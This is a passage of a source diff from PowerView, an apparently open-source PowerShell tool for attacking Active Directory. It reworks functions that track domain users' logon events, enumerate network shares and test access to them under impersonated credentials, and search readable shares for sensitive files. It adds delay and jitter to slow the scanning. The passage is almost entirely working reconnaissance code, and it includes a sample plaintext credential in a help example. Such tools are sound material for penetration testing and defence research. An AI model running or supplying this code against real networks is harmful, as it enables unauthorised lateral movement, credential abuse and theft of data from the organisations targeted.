- ($_.AccountName).split("/")[1].toLower()
- } | Where-Object {$_}
- }
- # if we get a specific username, only use that
- elseif($UserName) {
- # Write-Verbose "[*] Using target user '$UserName'..."
- $TargetUsers = $UserName | ForEach-Object {$_.ToLower()}
- if($TargetUsers -isnot [System.Array]) {
- $TargetUsers = @($TargetUsers)
- }
- }
- # read in a target user list if we have one
- elseif($UserFile) {
- $TargetUsers = Get-Content -Path $UserFile | Where-Object {$_}
- }
- elseif($UserADSpath -or $UserFilter) {
- ForEach ($Domain in $TargetDomains) {
- Write-Verbose "[*] Querying domain $Domain for users"
- $TargetUsers += Get-NetUser -Domain $Domain -DomainController $DomainController -Credential $Credential -ADSpath $UserADSpath -Filter $UserFilter | ForEach-Object {
- $_.samaccountname
- } | Where-Object {$_}
- }
+ BEGIN {
+ $UserSearcherArguments = @{
+ 'Properties' = 'samaccountname'
+ }
+ if ($PSBoundParameters['UserIdentity']) { $UserSearcherArguments['Identity'] = $UserIdentity }
+ if ($PSBoundParameters['UserDomain']) { $UserSearcherArguments['Domain'] = $UserDomain }
+ if ($PSBoundParameters['UserLDAPFilter']) { $UserSearcherArguments['LDAPFilter'] = $UserLDAPFilter }
+ if ($PSBoundParameters['UserSearchBase']) { $UserSearcherArguments['SearchBase'] = $UserSearchBase }
+ if ($PSBoundParameters['UserAdminCount']) { $UserSearcherArguments['AdminCount'] = $UserAdminCount }
+ if ($PSBoundParameters['Server']) { $UserSearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $UserSearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $UserSearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $UserSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $UserSearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $UserSearcherArguments['Credential'] = $Credential }
+
+ if ($PSBoundParameters['UserIdentity'] -or $PSBoundParameters['UserLDAPFilter'] -or $PSBoundParameters['UserSearchBase'] -or $PSBoundParameters['UserAdminCount']) {
+ $TargetUsers = Get-DomainUser @UserSearcherArguments | Select-Object -ExpandProperty samaccountname
+ }
+ elseif ($PSBoundParameters['UserGroupIdentity'] -or (-not $PSBoundParameters['Filter'])) {
+ # otherwise we're querying a specific group
+ $GroupSearcherArguments = @{
+ 'Identity' = $UserGroupIdentity
+ 'Recurse' = $True
+ }
+ Write-Verbose "UserGroupIdentity: $UserGroupIdentity"
+ if ($PSBoundParameters['UserDomain']) { $GroupSearcherArguments['Domain'] = $UserDomain }
+ if ($PSBoundParameters['UserSearchBase']) { $GroupSearcherArguments['SearchBase'] = $UserSearchBase }
+ if ($PSBoundParameters['Server']) { $GroupSearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $GroupSearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $GroupSearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $GroupSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $GroupSearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $GroupSearcherArguments['Credential'] = $Credential }
+ $TargetUsers = Get-DomainGroupMember @GroupSearcherArguments | Select-Object -ExpandProperty MemberName
+ }
+
+ # build the set of computers to enumerate
+ if ($PSBoundParameters['ComputerName']) {
+ $TargetComputers = $ComputerName
}
else {
- ForEach ($Domain in $TargetDomains) {
- Write-Verbose "[*] Querying domain $Domain for users of group '$GroupName'"
- $TargetUsers += Get-NetGroupMember -GroupName $GroupName -Domain $Domain -DomainController $DomainController -Credential $Credential | ForEach-Object {
- $_.MemberName
- }
+ # if not -ComputerName is passed, query the current (or target) domain for domain controllers
+ $DCSearcherArguments = @{
+ 'LDAP' = $True
}
+ if ($PSBoundParameters['Domain']) { $DCSearcherArguments['Domain'] = $Domain }
+ if ($PSBoundParameters['Server']) { $DCSearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['Credential']) { $DCSearcherArguments['Credential'] = $Credential }
+ Write-Verbose "[Find-DomainUserEvent] Querying for domain controllers in domain: $Domain"
+ $TargetComputers = Get-DomainController @DCSearcherArguments | Select-Object -ExpandProperty dnshostname
}
-
- if (((!$TargetUsers) -or ($TargetUsers.Count -eq 0))) {
- throw "[!] No users found to search for!"
+ if ($TargetComputers -and ($TargetComputers -isnot [System.Array])) {
+ $TargetComputers = @(,$TargetComputers)
+ }
+ Write-Verbose "[Find-DomainUserEvent] TargetComputers length: $($TargetComputers.Length)"
+ Write-Verbose "[Find-DomainUserEvent] TargetComputers $TargetComputers"
+ if ($TargetComputers.Length -eq 0) {
+ throw '[Find-DomainUserEvent] No hosts found to enumerate'
}
- # script block that enumerates a server
+ # the host enumeration block we're using to enumerate all servers
$HostEnumBlock = {
- param($ComputerName, $Ping, $TargetUsers, $SearchDays, $Credential)
+ Param($ComputerName, $StartTime, $EndTime, $MaxEvents, $TargetUsers, $Filter, $Credential)
- # optionally check if the server is up first
- $Up = $True
- if($Ping) {
- $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName
- }
- if($Up) {
- # try to enumerate
- if($Credential) {
- Get-UserEvent -ComputerName $ComputerName -Credential $Credential -EventType 'all' -DateStart ([DateTime]::Today.AddDays(-$SearchDays)) | Where-Object {
- # filter for the target user set
- $TargetUsers -contains $_.UserName
+ ForEach ($TargetComputer in $ComputerName) {
+ $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer
+ if ($Up) {
+ $DomainUserEventArgs = @{
+ 'ComputerName' = $TargetComputer
}
- }
- else {
- Get-UserEvent -ComputerName $ComputerName -EventType 'all' -DateStart ([DateTime]::Today.AddDays(-$SearchDays)) | Where-Object {
- # filter for the target user set
- $TargetUsers -contains $_.UserName
+ if ($StartTime) { $DomainUserEventArgs['StartTime'] = $StartTime }
+ if ($EndTime) { $DomainUserEventArgs['EndTime'] = $EndTime }
+ if ($MaxEvents) { $DomainUserEventArgs['MaxEvents'] = $MaxEvents }
+ if ($Credential) { $DomainUserEventArgs['Credential'] = $Credential }
+ if ($Filter -or $TargetUsers) {
+ if ($TargetUsers) {
+ Get-DomainUserEvent @DomainUserEventArgs | Where-Object {$TargetUsers -contains $_.TargetUserName}
+ }
+ else {
+ $Operator = 'or'
+ $Filter.Keys | ForEach-Object {
+ if (($_ -eq 'Op') -or ($_ -eq 'Operator') -or ($_ -eq 'Operation')) {
+ if (($Filter[$_] -match '&') -or ($Filter[$_] -eq 'and')) {
+ $Operator = 'and'
+ }
+ }
+ }
+ $Keys = $Filter.Keys | Where-Object {($_ -ne 'Op') -and ($_ -ne 'Operator') -and ($_ -ne 'Operation')}
+ Get-DomainUserEvent @DomainUserEventArgs | ForEach-Object {
+ if ($Operator -eq 'or') {
+ ForEach ($Key in $Keys) {
+ if ($_."$Key" -match $Filter[$Key]) {
+ $_
+ }
+ }
+ }
+ else {
+ # and all clauses
+ ForEach ($Key in $Keys) {
+ if ($_."$Key" -notmatch $Filter[$Key]) {
+ break
+ }
+ $_
+ }
+ }
+ }
+ }
+ }
+ else {
+ Get-DomainUserEvent @DomainUserEventArgs
}
}
}
}
-
}
- process {
-
- if($Threads) {
- Write-Verbose "Using threading with threads = $Threads"
-
- # if we're using threading, kick off the script block with Invoke-ThreadedFunction
- $ScriptParams = @{
- 'Ping' = $(-not $NoPing)
- 'TargetUsers' = $TargetUsers
- 'SearchDays' = $SearchDays
- 'Credential' = $Credential
- }
-
- # kick off the threaded script block + arguments
- Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
- }
-
- else {
- if(-not $NoPing -and ($ComputerName.count -ne 1)) {
- # ping all hosts in parallel
- $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}}
- $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100
- }
+ PROCESS {
+ # only ignore threading if -Delay is passed
+ if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
- Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)"
+ Write-Verbose "[Find-DomainUserEvent] Total number of hosts: $($TargetComputers.count)"
+ Write-Verbose "[Find-DomainUserEvent] Delay: $Delay, Jitter: $Jitter"
$Counter = 0
+ $RandNo = New-Object System.Random
- ForEach ($Computer in $ComputerName) {
-
+ ForEach ($TargetComputer in $TargetComputers) {
$Counter = $Counter + 1
# sleep for our semi-randomized interval
Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
- Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))"
- Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $Computer, $(-not $NoPing), $TargetUsers, $SearchDays, $Credential
+ Write-Verbose "[Find-DomainUserEvent] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))"
+ $Result = Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $StartTime, $EndTime, $MaxEvents, $TargetUsers, $Filter, $Credential
+ $Result
+
+ if ($Result -and $StopOnSuccess) {
+ Write-Verbose "[Find-DomainUserEvent] Target user found, returning early"
+ return
+ }
}
}
+ else {
+ Write-Verbose "[Find-DomainUserEvent] Using threading with threads: $Threads"
+
+ # if we're using threading, kick off the script block with New-ThreadedFunction
+ $ScriptParams = @{
+ 'StartTime' = $StartTime
+ 'EndTime' = $EndTime
+ 'MaxEvents' = $MaxEvents
+ 'TargetUsers' = $TargetUsers
+ 'Filter' = $Filter
+ 'Credential' = $Credential
+ }
+ # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params
+ New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
+ }
}
}
-function Invoke-ShareFinder {
+function Find-DomainShare {
<#
- .SYNOPSIS
+.SYNOPSIS
- This function finds the local domain name for a host using Get-NetDomain,
- queries the domain for all active machines with Get-NetComputer, then for
- each server it lists of active shares with Get-NetShare. Non-standard shares
- can be filtered out with -Exclude* flags.
+Searches for computer shares on the domain. If -CheckShareAccess is passed,
+then only shares the current user has read access to are returned.
- Author: @harmj0y
- License: BSD 3-Clause
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, New-ThreadedFunction
- .PARAMETER ComputerName
+.DESCRIPTION
- Host array to enumerate, passable on the pipeline.
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and enumerates the available shares for each
+machine with Get-NetShare. If -CheckShareAccess is passed, then
+[IO.Directory]::GetFiles() is used to check if the current user has read
+access to the given share. If -Credential is passed, then
+Invoke-UserImpersonation is used to impersonate the specified user before
+enumeration, reverting after with Invoke-RevertToSelf.
- .PARAMETER ComputerFile
+.PARAMETER ComputerName
- File of hostnames/IPs to search.
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
- .PARAMETER ComputerFilter
+.PARAMETER ComputerDomain
- Host filter name to query AD for, wildcards accepted.
+Specifies the domain to query for computers, defaults to the current domain.
- .PARAMETER ComputerADSpath
+.PARAMETER ComputerLDAPFilter
- The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
- Useful for OU queries.
+Specifies an LDAP query string that is used to search for computer objects.
- .PARAMETER ExcludeStandard
+.PARAMETER ComputerSearchBase
- Switch. Exclude standard shares from display (C$, IPC$, print$ etc.)
+Specifies the LDAP source to search through for computers,
+e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
- .PARAMETER ExcludePrint
+.PARAMETER ComputerOperatingSystem
- Switch. Exclude the print$ share.
+Search computers with a specific operating system, wildcards accepted.
- .PARAMETER ExcludeIPC
+.PARAMETER ComputerServicePack
- Switch. Exclude the IPC$ share.
+Search computers with a specific service pack, wildcards accepted.
- .PARAMETER CheckShareAccess
+.PARAMETER ComputerSiteName
- Switch. Only display found shares that the local user has access to.
+Search computers in the specific AD Site name, wildcards accepted.
- .PARAMETER CheckAdmin
+.PARAMETER CheckShareAccess
- Switch. Only display ADMIN$ shares the local user has access to.
+Switch. Only display found shares that the local user has access to.
- .PARAMETER NoPing
+.PARAMETER Server
- Switch. Don't ping each host to ensure it's up before enumerating.
+Specifies an Active Directory server (domain controller) to bind to.
- .PARAMETER Delay
+.PARAMETER SearchScope
- Delay between enumerating hosts, defaults to 0.
+Specifies the scope to search under for computers, Base/OneLevel/Subtree (default of Subtree).
- .PARAMETER Jitter
+.PARAMETER ResultPageSize
- Jitter for the host delay, defaults to +/- 0.3.
+Specifies the PageSize to set for the LDAP searcher object.
- .PARAMETER Domain
+.PARAMETER ServerTimeLimit
- Domain to query for machines, defaults to the current domain.
+Specifies the maximum amount of time the server spends searching. Default of 120 seconds.
- .PARAMETER DomainController
+.PARAMETER Tombstone
- Domain controller to reflect LDAP queries through.
+Switch. Specifies that the searcher should also return deleted/tombstoned objects.
- .PARAMETER SearchForest
+.PARAMETER Credential
- Switch. Search all domains in the forest for target users instead of just
- a single domain.
+A [Management.Automation.PSCredential] object of alternate credentials
+for connection to the target domain and target systems.
- .PARAMETER Threads
+.PARAMETER Delay
- The maximum concurrent threads to execute.
+Specifies the delay (in seconds) between enumerating hosts, defaults to 0.
- .EXAMPLE
+.PARAMETER Jitter
- PS C:\> Invoke-ShareFinder -ExcludeStandard
+Specifies the jitter (0-1.0) to apply to any specified -Delay, defaults to +/- 0.3
- Find non-standard shares on the domain.
+.PARAMETER Threads
- .EXAMPLE
+The number of threads to use for user searching, defaults to 20.
- PS C:\> Invoke-ShareFinder -Threads 20
+.EXAMPLE
- Multi-threaded share finding, replaces Invoke-ShareFinderThreaded.
+Find-DomainShare
- .EXAMPLE
+Find all domain shares in the current domain.
- PS C:\> Invoke-ShareFinder -Delay 60
+.EXAMPLE
- Find shares on the domain with a 60 second (+/- *.3)
- randomized delay between touching each host.
+Find-DomainShare -CheckShareAccess
- .EXAMPLE
+Find all domain shares in the current domain that the current user has
+read access to.
- PS C:\> Invoke-ShareFinder -ComputerFile hosts.txt
+.EXAMPLE
- Find shares for machines in the specified hosts file.
+$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
+$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
+Find-DomainShare -Domain testlab.local -Credential $Cred
- .LINK
- http://blog.harmj0y.net
+Searches for domain shares in the testlab.local domain using the specified alternate credentials.
+
+.OUTPUTS
+
+PowerView.ShareInfo
#>
- [CmdletBinding()]
- param(
- [Parameter(Position=0,ValueFromPipeline=$True)]
- [Alias('Hosts')]
+ [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')]
+ [OutputType('PowerView.ShareInfo')]
+ Param(
+ [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)]
+ [Alias('DNSHostName')]
[String[]]
$ComputerName,
- [ValidateScript({Test-Path -Path $_ })]
- [Alias('HostList')]
+ [ValidateNotNullOrEmpty()]
+ [Alias('Domain')]
[String]
- $ComputerFile,
+ $ComputerDomain,
+ [ValidateNotNullOrEmpty()]
[String]
- $ComputerFilter,
+ $ComputerLDAPFilter,
+ [ValidateNotNullOrEmpty()]
[String]
- $ComputerADSpath,
-
- [Switch]
- $ExcludeStandard,
+ $ComputerSearchBase,
- [Switch]
- $ExcludePrint,
+ [ValidateNotNullOrEmpty()]
+ [Alias('OperatingSystem')]
+ [String]
+ $ComputerOperatingSystem,
- [Switch]
- $ExcludeIPC,
+ [ValidateNotNullOrEmpty()]
+ [Alias('ServicePack')]
+ [String]
+ $ComputerServicePack,
- [Switch]
- $NoPing,
+ [ValidateNotNullOrEmpty()]
+ [Alias('SiteName')]
+ [String]
+ $ComputerSiteName,
+ [Alias('CheckAccess')]
[Switch]
$CheckShareAccess,
- [Switch]
- $CheckAdmin,
+ [ValidateNotNullOrEmpty()]
+ [Alias('DomainController')]
+ [String]
+ $Server,
- [UInt32]
- $Delay = 0,
+ [ValidateSet('Base', 'OneLevel', 'Subtree')]
+ [String]
+ $SearchScope = 'Subtree',
- [Double]
- $Jitter = .3,
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ResultPageSize = 200,
- [String]
- $Domain,
+ [ValidateRange(1, 10000)]
+ [Int]
+ $ServerTimeLimit,
- [String]
- $DomainController,
-
[Switch]
- $SearchForest,
+ $Tombstone,
- [ValidateRange(1,100)]
- [Int]
- $Threads
- )
+ [Management.Automation.PSCredential]
+ [Management.Automation.CredentialAttribute()]
+ $Credential = [Management.Automation.PSCredential]::Empty,
- begin {
- if ($PSBoundParameters['Debug']) {
- $DebugPreference = 'Continue'
- }
+ [ValidateRange(1, 10000)]
+ [Int]
+ $Delay = 0,
- # random object for delay
- $RandNo = New-Object System.Random
+ [ValidateRange(0.0, 1.0)]
+ [Double]
+ $Jitter = .3,
- Write-Verbose "[*] Running Invoke-ShareFinder with delay of $Delay"
+ [Int]
+ [ValidateRange(1, 100)]
+ $Threads = 20
+ )
- # figure out the shares we want to ignore
- [String[]] $ExcludedShares = @('')
+ BEGIN {
- if ($ExcludePrint) {
- $ExcludedShares = $ExcludedShares + "PRINT$"
+ $ComputerSearcherArguments = @{
+ 'Properties' = 'dnshostname'
}
- if ($ExcludeIPC) {
- $ExcludedShares = $ExcludedShares + "IPC$"
+ if ($PSBoundParameters['ComputerDomain']) { $ComputerSearcherArguments['Domain'] = $ComputerDomain }
+ if ($PSBoundParameters['ComputerLDAPFilter']) { $ComputerSearcherArguments['LDAPFilter'] = $ComputerLDAPFilter }
+ if ($PSBoundParameters['ComputerSearchBase']) { $ComputerSearcherArguments['SearchBase'] = $ComputerSearchBase }
+ if ($PSBoundParameters['Unconstrained']) { $ComputerSearcherArguments['Unconstrained'] = $Unconstrained }
+ if ($PSBoundParameters['ComputerOperatingSystem']) { $ComputerSearcherArguments['OperatingSystem'] = $OperatingSystem }
+ if ($PSBoundParameters['ComputerServicePack']) { $ComputerSearcherArguments['ServicePack'] = $ServicePack }
+ if ($PSBoundParameters['ComputerSiteName']) { $ComputerSearcherArguments['SiteName'] = $SiteName }
+ if ($PSBoundParameters['Server']) { $ComputerSearcherArguments['Server'] = $Server }
+ if ($PSBoundParameters['SearchScope']) { $ComputerSearcherArguments['SearchScope'] = $SearchScope }
+ if ($PSBoundParameters['ResultPageSize']) { $ComputerSearcherArguments['ResultPageSize'] = $ResultPageSize }
+ if ($PSBoundParameters['ServerTimeLimit']) { $ComputerSearcherArguments['ServerTimeLimit'] = $ServerTimeLimit }
+ if ($PSBoundParameters['Tombstone']) { $ComputerSearcherArguments['Tombstone'] = $Tombstone }
+ if ($PSBoundParameters['Credential']) { $ComputerSearcherArguments['Credential'] = $Credential }
+
+ if ($PSBoundParameters['ComputerName']) {
+ $TargetComputers = $ComputerName
}
- if ($ExcludeStandard) {
- $ExcludedShares = @('', "ADMIN$", "IPC$", "C$", "PRINT$")
+ else {
+ Write-Verbose '[Find-DomainShare] Querying computers in the domain'
+ $TargetComputers = Get-DomainComputer @ComputerSearcherArguments | Select-Object -ExpandProperty dnshostname
}
-
- # if we're using a host file list, read the targets in and add them to the target list
- if($ComputerFile) {
- $ComputerName = Get-Content -Path $ComputerFile
+ Write-Verbose "[Find-DomainShare] TargetComputers length: $($TargetComputers.Length)"
+ if ($TargetComputers.Length -eq 0) {
+ throw '[Find-DomainShare] No hosts found to enumerate'
}
- if(!$ComputerName) {
- [array]$ComputerName = @()
+ # the host enumeration block we're using to enumerate all servers
+ $HostEnumBlock = {
+ Param($ComputerName, $CheckShareAccess, $TokenHandle)
- if($Domain) {
- $TargetDomains = @($Domain)
+ if ($TokenHandle) {
+ # impersonate the the token produced by LogonUser()/Invoke-UserImpersonation
+ $Null = Invoke-UserImpersonation -TokenHandle $TokenHandle -Quiet
}
- elseif($SearchForest) {
- # get ALL the domains in the forest to search
- $TargetDomains = Get-NetForestDomain | ForEach-Object { $_.Name }
- }
- else {
- # use the local domain
- $TargetDomains = @( (Get-NetDomain).name )
- }
-
- ForEach ($Domain in $TargetDomains) {
- Write-Verbose "[*] Querying domain $Domain for hosts"
- $ComputerName += Get-NetComputer -Domain $Domain -DomainController $DomainController -Filter $ComputerFilter -ADSpath $ComputerADSpath
- }
-
- # remove any null target hosts, uniquify the list and shuffle it
- $ComputerName = $ComputerName | Where-Object { $_ } | Sort-Object -Unique | Sort-Object { Get-Random }
- if($($ComputerName.count) -eq 0) {
- throw "No hosts found!"
- }
- }
- # script block that enumerates a server
- $HostEnumBlock = {
- param($ComputerName, $Ping, $CheckShareAccess, $ExcludedShares, $CheckAdmin)
-
- # optionally check if the server is up first
- $Up = $True
- if($Ping) {
- $Up = Test-Connection -Count 1 -Quiet -ComputerName $ComputerName
- }
- if($Up) {
- # get the shares for this host and check what we find
- $Shares = Get-NetShare -ComputerName $ComputerName
- ForEach ($Share in $Shares) {
- Write-Verbose "[*] Server share: $Share"
- $NetName = $Share.shi1_netname
- $Remark = $Share.shi1_remark
- $Path = '\\'+$ComputerName+'\'+$NetName
-
- # make sure we get a real share name back
- if (($NetName) -and ($NetName.trim() -ne '')) {
- # if we're just checking for access to ADMIN$
- if($CheckAdmin) {
- if($NetName.ToUpper() -eq "ADMIN$") {
- try {
- $Null = [IO.Directory]::GetFiles($Path)
- "\\$ComputerName\$NetName `t- $Remark"
- }
- catch {
- Write-Verbose "Error accessing path $Path : $_"
- }
- }
- }
- # skip this share if it's in the exclude list
- elseif ($ExcludedShares -NotContains $NetName.ToUpper()) {
+ ForEach ($TargetComputer in $ComputerName) {
+ $Up = Test-Connection -Count 1 -Quiet -ComputerName $TargetComputer
+ if ($Up) {
+ # get the shares for this host and check what we find
+ $Shares = Get-NetShare -ComputerName $TargetComputer
+ ForEach ($Share in $Shares) {
+ $ShareName = $Share.Name
+ # $Remark = $Share.Remark
+ $Path = '\\'+$TargetComputer+'\'+$ShareName
+
+ if (($ShareName) -and ($ShareName.trim() -ne '')) {
# see if we want to check access to this share
- if($CheckShareAccess) {
+ if ($CheckShareAccess) {
# check if the user has access to this path
try {
$Null = [IO.Directory]::GetFiles($Path)
- "\\$ComputerName\$NetName `t- $Remark"
+ $Share
}
catch {
- Write-Verbose "Error accessing path $Path : $_"
+ Write-Verbose "Error accessing share path $Path : $_"
}
}
else {
- "\\$ComputerName\$NetName `t- $Remark"
+ $Share
}
}
}
}
}
- }
- }
-
- process {
-
- if($Threads) {
- Write-Verbose "Using threading with threads = $Threads"
-
- # if we're using threading, kick off the script block with Invoke-ThreadedFunction
- $ScriptParams = @{
- 'Ping' = $(-not $NoPing)
- 'CheckShareAccess' = $CheckShareAccess
- 'ExcludedShares' = $ExcludedShares
- 'CheckAdmin' = $CheckAdmin
+ if ($TokenHandle) {
+ Invoke-RevertToSelf
}
-
- # kick off the threaded script block + arguments
- Invoke-ThreadedFunction -ComputerName $ComputerName -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
}
- else {
- if(-not $NoPing -and ($ComputerName.count -ne 1)) {
- # ping all hosts in parallel
- $Ping = {param($ComputerName) if(Test-Connection -ComputerName $ComputerName -Count 1 -Quiet -ErrorAction Stop){$ComputerName}}
- $ComputerName = Invoke-ThreadedFunction -NoImports -ComputerName $ComputerName -ScriptBlock $Ping -Threads 100
+ $LogonToken = $Null
+ if ($PSBoundParameters['Credential']) {
+ if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
+ $LogonToken = Invoke-UserImpersonation -Credential $Credential
}
+ else {
+ $LogonToken = Invoke-UserImpersonation -Credential $Credential -Quiet
+ }
+ }
+ }
- Write-Verbose "[*] Total number of active hosts: $($ComputerName.count)"
- $Counter = 0
+ PROCESS {
+ # only ignore threading if -Delay is passed
+ if ($PSBoundParameters['Delay'] -or $PSBoundParameters['StopOnSuccess']) {
- ForEach ($Computer in $ComputerName) {
+ Write-Verbose "[Find-DomainShare] Total number of hosts: $($TargetComputers.count)"
+ Write-Verbose "[Find-DomainShare] Delay: $Delay, Jitter: $Jitter"
+ $Counter = 0
+ $RandNo = New-Object System.Random
+ ForEach ($TargetComputer in $TargetComputers) {
$Counter = $Counter + 1
# sleep for our semi-randomized interval
Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
- Write-Verbose "[*] Enumerating server $Computer ($Counter of $($ComputerName.count))"
- Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $Computer, $False, $CheckShareAccess, $ExcludedShares, $CheckAdmin
+ Write-Verbose "[Find-DomainShare] Enumerating server $TargetComputer ($Counter of $($TargetComputers.count))"
+ Invoke-Command -ScriptBlock $HostEnumBlock -ArgumentList $TargetComputer, $CheckShareAccess, $LogonToken
}
}
-
- }
-}
-
-
-function Invoke-FileFinder {
-<#
- .SYNOPSIS
-
- Finds sensitive files on the domain.
-
- Author: @harmj0y
- License: BSD 3-Clause
-
- .DESCRIPTION
-
- This function finds the local domain name for a host using Get-NetDomain,
- queries the domain for all active machines with Get-NetComputer, grabs
- the readable shares for each server, and recursively searches every
- share for files with specific keywords in the name.
- If a share list is passed, EVERY share is enumerated regardless of
- other options.
+ else {
+ Write-Verbose "[Find-DomainShare] Using threading with threads: $Threads"
- .PARAMETER ComputerName
+ # if we're using threading, kick off the script block with New-ThreadedFunction
+ $ScriptParams = @{
+ 'CheckShareAccess' = $CheckShareAccess
+ 'TokenHandle' = $LogonToken
+ }
- Host array to enumerate, passable on the pipeline.
+ # if we're using threading, kick off the script block with New-ThreadedFunction using the $HostEnumBlock + params
+ New-ThreadedFunction -ComputerName $TargetComputers -ScriptBlock $HostEnumBlock -ScriptParameters $ScriptParams -Threads $Threads
+ }
+ }
- .PARAMETER ComputerFile
+ END {
+ if ($LogonToken) {
+ Invoke-RevertToSelf -TokenHandle $LogonToken
+ }
+ }
+}
- File of hostnames/IPs to search.
- .PARAMETER ComputerFilter
+function Find-InterestingDomainShareFile {
+<#
+.SYNOPSIS
- Host filter name to query AD for, wildcards accepted.
+Searches for files matching specific criteria on readable shares
+in the domain.
- .PARAMETER ComputerADSpath
+Author: Will Schroeder (@harmj0y)
+License: BSD 3-Clause
+Required Dependencies: Get-DomainComputer, Invoke-UserImpersonation, Invoke-RevertToSelf, Get-NetShare, Find-InterestingFile, New-ThreadedFunction
- The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local"
- Useful for OU queries.
+.DESCRIPTION
- .PARAMETER ShareList
+This function enumerates all machines on the current (or specified) domain
+using Get-DomainComputer, and enumerates the available shares for each
+machine with Get-NetShare. It will then use Find-InterestingFile on each
+readhable share, searching for files marching specific criteria. If -Credential
+is passed, then Invoke-UserImpersonation is used to impersonate the specified
+user before enumeration, reverting after with Invoke-RevertToSelf.
- List if \\HOST\shares to search through.
+.PARAMETER ComputerName
- .PARAMETER Terms
+Specifies an array of one or more hosts to enumerate, passable on the pipeline.
+If -ComputerName is not passed, the default behavior is to enumerate all machines
+in the domain returned by Get-DomainComputer.
- Terms to search for.
+.PARAMETER ComputerDomain
- .PARAMETER OfficeDocs
+Specifies the domain to query for computers, defaults to the current domain.
- Switch. Search for office documents (*.doc*, *.xls*, *.ppt*)
+.PARAMETER ComputerLDAPFilter
- .PARAMETER FreshEXEs
+Specifies an LDAP query string that is used to search for computer objects.
- Switch. Find .EXEs accessed within the last week.
+.PARAMETER ComputerSearchBase
- .PARAMETER LastAccessTime
+Specifies the LDAP source to search through for computers,
+e.g. "LDAP://OU=secret,DC=testlab,DC=local". Useful for OU queries.
- Only return files with a LastAccessTime greater than this date value.
+.PARAMETER ComputerOperatingSystem
- .PARAMETER LastWriteTime
+Search computers with a specific operating system, wildcards accepted.
- Only return files with a LastWriteTime greater than this date value.
+.PARAMETER ComputerServicePack
- .PARAMETER CreationTime
+Search computers with a specific service pack, wildcards accepted.
- Only return files with a CreationDate greater than this date value.
+.PARAMETER ComputerSiteName
- .PARAMETER IncludeC
+Search computers in the specific AD Site name, wildcards accepted.
- Switch. Include any C$ shares in recursive searching (default ignore).
+.PARAMETER Include
- .PARAMETER IncludeAdmin
+Only return files/folders that match the specified array of strings,
+i.e. @(*.doc*, *.xls*, *.ppt*)
- Switch. Include any ADMIN$ shares in recursive searching (default ignore).
+.PARAMETER SharePath
- .PARAMETER ExcludeFolders
+Specifies one or more specific share paths to search, in the form \\COMPUTER\Share
- Switch. Exclude folders from the search results.
+.PARAMETER ExcludedShares
- .PARAMETER ExcludeHidden
+Specifies share paths to exclude, default of C$, Admin$, Print$, IPC$.
- Switch. Exclude hidden files and folders from the search results.
+.PARAMETER LastAccessTime
- .PARAMETER CheckWriteAccess
+Only return files with a LastAccessTime greater than this date value.
- Switch. Only returns files the current user has write access to.
+.PARAMETER LastWriteTime
- .PARAMETER OutFile
+Only return files with a LastWriteTime greater than this date value.
- Output results to a specified csv output file.
+.PARAMETER CreationTime
- .PARAMETER NoClobber
+Only return files with a CreationTime greater than this date value.
- Switch. Don't overwrite any existing output file.
+.PARAMETER OfficeDocs
- .PARAMETER NoPing
+Switch. Search for office documents (*.doc*, *.xls*, *.ppt*)
- Switch. Don't ping each host to ensure it's up before enumerating.
+.PARAMETER FreshEXEs
- .PARAMETER Delay
